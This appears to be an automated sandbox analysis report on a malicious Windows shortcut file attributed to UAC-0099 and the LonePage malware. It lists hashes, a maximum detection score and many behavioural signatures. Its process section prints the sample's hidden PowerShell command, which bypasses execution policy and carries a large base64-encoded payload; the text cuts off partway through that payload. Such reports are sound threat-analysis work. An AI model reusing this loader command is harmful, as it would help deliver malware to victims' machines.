Edit tour
Windows
Analysis Report
XA5hQdlKVd.lnk
Overview
General Information
Sample name: | XA5hQdlKVd.lnkrenamed because original name is a hash value |
Original sample name: | 0acd4a9ef18f3fd1ccf440879e768089d4dd2107e1ce19d2a17a59ebed8c7f5d.lnk |
Analysis ID: | 1522686 |
MD5: | 4e37f3bbf59b456fb07dc71f3fc20dba |
SHA1: | 816ade8789655d00cc33d290a7d8f8c3321f80c0 |
SHA256: | 0acd4a9ef18f3fd1ccf440879e768089d4dd2107e1ce19d2a17a59ebed8c7f5d |
Tags: | lnkUAC-0099user-JAMESWT_MHT |
Infos: | |
Detection
LonePage
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected LonePage
AI detected suspicious sample
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Potential dropper URLs found in powershell memory
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- powershell.exe (PID: 3540 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden -nop -noni -exec byp ass -c $te mp='UEsDBB QACAgIAF0n BFcAAAAAAA AAAAAAAAAL AAAAX3JlbH MvLnJlbHOt kk1LA0EMhu /9FUPu3Wwr iMjO9iJCby L1B4SZ7O7Q zgczaa3/3k EKulCKoMe8 efPwHNJtzv 6gTpyLi0HD qmlBcTDRuj BqeNs9Lx9g 0y+6Vz6Q1E qZXCqq3oSi YRJJj4jFTO ypNDFxqJsh Zk9SxzxiIr OnkXHdtveY fzKgnzHV1m rIW7sCtftI /Dc2ehayJI QmZl6mXK+z OC4VTnlk0W Cjealx+Wo0 lQx4XWj9e6 E4DM7wUzRH z0GuefFZOF i2t5UopVtG d/9pNG98y7 zHbNFe4ovN osPZG/SfUE sHCOjQASPZ AAAAPQIAAF BLAwQUAAgI CABdJwRXAA AAAAAAAAAA AAAAEQAAAG RvY1Byb3Bz L2NvcmUueG 1sbVJbS8Mw FH73V5S8t+ kFZZS2A5U9 ORA2UXyLyV kXbdKQnK3b vzdtt7rhoA /nu/Q7OScp 5gfVBHuwTr a6JEkUkwA0 b4XUdUne1o twRgKHTAvW tBpKcgRH5t VdwU3OWwuv tjVgUYILfJ B2OTcl2SKa nFLHt6CYi7 xDe3HTWsXQ Q1tTw/gPq4 GmcfxAFSAT DBntA0MzJZ JTpOBTpNnZ ZggQnEIDCj Q6mkQJ/fMi WOVu/jAoF0 4l8WjgpvUs Tu6Dk5Ox67 qoywarP39C P5Yvq2HUUO p+VRxIVQie cwsMW1sV9B L4WoDjVhr0 Kx/FK8Ljhu l65/dTgQ7f VoNlovrNN8 zh0t/RRoJ4 PPqMG9xpE7 k6cYEfIR8H Pkvv2dPzek GqNE6zMJ6F cbZOs/x+5r /Pvul1wNDZ wl72T6VKhq YT7E/tdl/f wHEcaQK+Ro kNjPS5/Pd8 ql9QSwcI1k Kz4VIBAACK AgAAUEsDBB QACAgIAF0n BFcAAAAAAA AAAAAAAAAQ AAAAZG9jUH JvcHMvYXBw LnhtbJ1R0W 6DIBR931cY s9eKUrW2oT TLlj01WZO5 dm8N4lVZFA jQpv37sTZz Pg9e7rnncA 5wyeYy9MEZ jBVKrsMkis MAJFe1kO06 /ChfZ0UYWM dkzXolYR1e wYYb+kB2Rm kwToANvIO0 67BzTq8Qsr yDgdnI09Iz jTIDcx6aFq mmERxeFD8N IB3CcZwjuD iQNdQzPRqG d8fV2f3XtF b85352X161 96OkhEH3zA El6K8slWN9 KQagsW+PgD xp3QvOnP8R uhWVgbdbBF pEmd/4cSvk 6XL8LPJjng YTwdE/4Qu4 Q5wVDSxSnO IcF3HWYDyv lgzP52nFF0 mRsKriVZMB QdOon9z9fR A0yaLYr5vg t0d2rAVLMU H3ghyUqS1N igVB95I8d8 ww7vwBmuS5 V04aE/IgXP euGfcmyTJJ p7IJ5fMMaw 3TnaXpLXWE HozTot9QSw cILVvKq0sB AABDAgAAUE sDBBQACAgI AF0nBFcAAA AAAAAAAAAA AAAcAAAAd2 9yZC9fcmVs cy9kb2N1bW VudC54bWwu cmVsc62RTQ rCMBCF954i zN6mVRCRpm 5EcCv1ADGd tsE2Cckoen sDiloo4sLl /H3vMS9fX/ uOXdAHbY2A LEmBoVG20q YRcCi30yWs i0m+x05SXA mtdoHFGxME tERuxXlQLf YyJNahiZPa +l5SLH3DnV Qn2SCfpemC +08GFAMm21 UC/K7KgJU3 h7+wbV1rhR urzj0aGpHg gW4dhkiUvk ES8KiTyAE+ Lj/7p3xtDZ Xy2OHbwav1 zcT8rz9Aop jl5xeenaeF Sc4H4RZ3UE sHCPkvMMDF AAAAEwIAAF BLAwQUAAgI CABdJwRXAA AAAAAAAAAA AAAAEQAAAH dvcmQvZG9j dW1lbnQueG 1s7V1bb9tG Fn7fXzHQQ7 ELKBJ1sSyr lYtugnQDpE FQp+hjQFGU xF1S1JKUZf fJjpqkBYI6 yAYukL2kwS 5291H2RrUS XwrsLxj+hf 0le84MSV0s JbZkxyI1Ti uSM3MOZ4bf mXPmduaTTz cMnayrlq2Z 9WIslZBiRK 0rZlmrV4ux r+7dvJaPEd uR62VZN+tq Mbap2rFPV3 /1SatQNpWm odYdAhzqds EsxppWvWAr NdWQ7WuGpl imbVaca4pp FMxKRVNU7x LzKKxirOY4 jUIy6RElzI Zah7iKaRmy A49WNclJbn jvSqYlKZe0 VF12IL92TW vYPrf1d71/ 3dD9dK2zvL VlWuWGZSqq bUNFGDp/ry Fr9YBNSjpD gZFPQNE4y5 vLltwaeOVw Rm7wyD5H+x TLIBsJyIZX e4wL8EtJI/ zWanJD7XOr zsbtc8tsNn xuhnKW0hqy 9YdmA2usAV +0pOmas8kK 3s9UKjtbrk brbDp+A/hJ LZ2PQTpgYC iFW9W6ackl HSQJckKweA Q4xlZBoEpm